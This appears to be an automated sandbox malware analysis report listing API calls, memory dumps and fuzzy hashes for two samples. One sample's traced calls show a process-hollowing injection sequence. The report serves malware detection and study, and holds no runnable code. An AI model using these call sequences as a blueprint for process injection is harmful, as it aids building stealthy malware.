Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

Function 02EE003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02EE024D

Strings

kernel32.dll, xrefs: 02EE008F, 02EE0095
cess, xrefs: 02EE018D

Memory Dump Source

Source File: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ee0000_rujtcgu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7044c0158e5495c91b6809575acef253c8493cedd29197697cac51bb82bb7e9e
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: C0526A74A01229DFDB64CF98C985BACBBB1BF09314F1480D9E54EAB351DB70AA85CF14

Function 02F21964 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F2198C
Module32First.KERNEL32(00000000,00000224), ref: 02F219AC

Memory Dump Source

Source File: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F1B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f1b000_rujtcgu.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 727ca69126069fef67eb670d773b38c93715bbfd73def66e448c72aaccf3ae46
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: F6F0F6319003216FD7203BF49C8CBAF76E9BF4A6A5F140228E74AE20C1DB70E80D4A65

Function 02EE0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02EE0223,?,?), ref: 02EE0E19
SetErrorMode.KERNELBASE(00000000,?,?,02EE0223,?,?), ref: 02EE0E1E

Memory Dump Source

Source File: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ee0000_rujtcgu.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 179eb12c8860f6d17e51d0351f74b3a90e9c5c64cc944f07b49318d719482cfa
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 08D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9180C7B0954046E5

Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B

Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B

Function 004019E7 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000004.00000002.1980980465.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rujtcgu.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction ID: 9426f979ca713991860f9ea44d55cd4c2553d935c0e8181050f05289ed5f003d
Opcode Fuzzy Hash: 188fd4d8d6eee7cd557e4d10eb30fffa0ab7ddb0591dde503fad6877693a3d2c
Instruction Fuzzy Hash: D401A776309204FBDB00AA959C41AAE37689F45310F204477F607B80F1E67D9A12AB2B

Function 02F21623 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F21674

Memory Dump Source

Source File: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F1B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f1b000_rujtcgu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 33f036d9e09128a46f857195bb79e8a438c6aa6c18fdaf4b86035e94839ceecf
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 93113F79A00208EFDB01DF98C985E99BFF5AF08350F058094FA489B362D371EA50DF84

Analysis Process: E609.exePID: 6956, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	28.9%
Total number of Nodes:	38
Total number of Limit Nodes:	8

Executed Functions

Function 04A10110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 04A10156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 04A1016C
CreateProcessA.KERNELBASE(?,00000000), ref: 04A10255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 04A10270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 04A10283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 04A1029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A102C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 04A102E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 04A10304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 04A1032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 04A10399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 04A103BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 04A103E1
ResumeThread.KERNELBASE(00000000), ref: 04A103ED
ExitProcess.KERNEL32(00000000), ref: 04A10412

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: b60735fe45fa30e49e72f8f53c53d6a706bbabc1bab4d82a9814d103798eb68a
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 3EB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE81CF94

Function 04A10420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 04A10533

Strings

saodkfnosa9uin, xrefs: 04A104DA
d, xrefs: 04A10584
mfoaskdfnoa, xrefs: 04A10520, 04A10523
0, xrefs: 04A10492

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: b84508933c54b72f4b401acc7ee7505e276e80a7699b4a85772567c97487eb42
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: F9513A70D08388DEEB11CBE8C849BDDBFB2AF15708F184058D5457F296C3BA6658CB62

Function 04A105B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 04A105EC

Strings

apfHQ, xrefs: 04A105E2, 04A105E5
o, xrefs: 04A10600

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 142e5624620bb18f7e4c5228d1d34695ed88cc230a1331ffdccf45d857c94169
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: A7012170C0824CEEDF10DB98C5583AEBFB5AF51308F1480D9C4193B252D7B69B98CBA1

Function 049767C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 049767EE
Module32First.KERNEL32(00000000,00000224), ref: 0497680E

Memory Dump Source

Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4976000_E609.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 880c1bbab896d72ac9a5da12e305c2ce2b2ecccb300b69376139a30897a46cc1
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: ACF06231200B116BD7203BB5A88DBAA76ECAF89775F100538E642914C0DA74FC454B61

Function 04976485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 049764D6

Memory Dump Source

Source File: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, Offset: 04976000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4976000_E609.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 01e5ca60748758b7960db77ee29c3ac651eba713f151f7b86b708d5f1b3d9faa
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6D113979A00208EFDB01DF98C985E99BBF5AF08350F0580A4F9489B361D371EA90EF80

Non-executed Functions

Function 04A2F030 Relevance: 19.9, APIs: 10, Strings: 1, Instructions: 696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04A2F0A7
_wcsstr.LIBCMT ref: 04A2F14E
_strstr.LIBCMT ref: 04A2F3D6
_malloc.LIBCMT ref: 04A2F526
_memset.LIBCMT ref: 04A2F534
_strstr.LIBCMT ref: 04A2F57A
_malloc.LIBCMT ref: 04A2F6F5
_memset.LIBCMT ref: 04A2F703
_free.LIBCMT ref: 04A2F7B5
_free.LIBCMT ref: 04A2F7C2

Strings

", xrefs: 04A2F640

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: _memset$_free_malloc_strstr$_wcsstr
String ID: "
API String ID: 430003804-123907689
Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction ID: 1f3e6c04be93f6e85f7d485ba56301c7085ead87f8a905a06af2f893f27a34f7
Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
Instruction Fuzzy Hash: A342C271508350AFE720DF28DD48B9B7BF8BF85308F04092DF58997191EB75A609DBA2

Function 04A200D0 Relevance: 9.7, APIs: 6, Instructions: 732COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction ID: a22c8e019b489050892f3f68e2622ea5122ca3d19428c53ba2674deb9b764b7f
Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
Instruction Fuzzy Hash: 3E528171D04228DFEF10DFA8CA84BDEBBB5BF04308F108569E519A7290E735BA44DB91

Function 04A1E6E0 Relevance: 8.2, APIs: 5, Instructions: 735COMMON

Download Yara Rule

APIs

_wcsstr.LIBCMT ref: 04A1E72D
_wcsstr.LIBCMT ref: 04A1E756
_memset.LIBCMT ref: 04A1E784

Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC1F
Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC34
Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC4D
Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC62
Part of subcall function 04A5FC0C: std::regex_error::regex_error.LIBCPMT ref: 04A5FC74
Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FC82
Part of subcall function 04A5FC0C: std::exception::exception.LIBCMT ref: 04A5FC9B
Part of subcall function 04A5FC0C: __CxxThrowException@8.LIBCMT ref: 04A5FCB0

_wcsstr.LIBCMT ref: 04A1EA0C
_memset.LIBCMT ref: 04A1EE5C

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
String ID:
API String ID: 1338678108-0
Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction ID: 4eeadb23d58811850ca9ced5de5f74a6d799dec8767dfacf0dfe3c50241342e3
Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction Fuzzy Hash: 1152CE71A002199FDF24CF68C994BAEBBF1FF48304F148569E846AB291E731A945CB91

Function 04A20B00 Relevance: 6.7, APIs: 4, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction ID: 40f2579c666ae376e2d95599b80ed57b1ea179c528ea86886739d2a1061def9e
Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
Instruction Fuzzy Hash: 2642AE71D04228DBEF14DFA8CA84BEEB7F5BF04308F244569E415A7290E731BA45DBA1

Function 04A1DBE0 Relevance: 5.2, APIs: 3, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 6a22f1c693067667c975fc6b946844b1355ab4cc21c94bae91fadc8cbd97c0e7
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 50525370E00219DFDB50DBA4C854FEEBBB5BF49704F148198E909AB2A0DB31BD45CBA0

Function 04A922C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

$, xrefs: 04A9291E

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 39b6a93c31a56325a4ffa99cc2caaec4842247dc7d9958b1e34fd5566ff5f67e
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 1B3250B1E00229AAEF619F64CC44BAEB7F9FF45704F0045EAE60CA6151DB749E80CF59

Function 04A15DF7 Relevance: .7, Instructions: 723COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
Instruction ID: b2fecf76a5b10737ab06900659fdaf3cbc94d3c636d9949bea12ba38c1f18aa5
Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
Instruction Fuzzy Hash: A042BF71629F159BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91

Function 04A1A026 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction ID: 9f3d1fc964501be7745bf230a96b4f923f147422840a9e001f568d6caf36998d
Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
Instruction Fuzzy Hash: CF22EFB6905B128FC714CF29D18055AF7E1FF88324F158A6EE8A9A7B10D730BA55CF81

Function 04A12B60 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4a10000_E609.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80

Function 04A13520 Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false

Joe Sandbox IDA Plugin

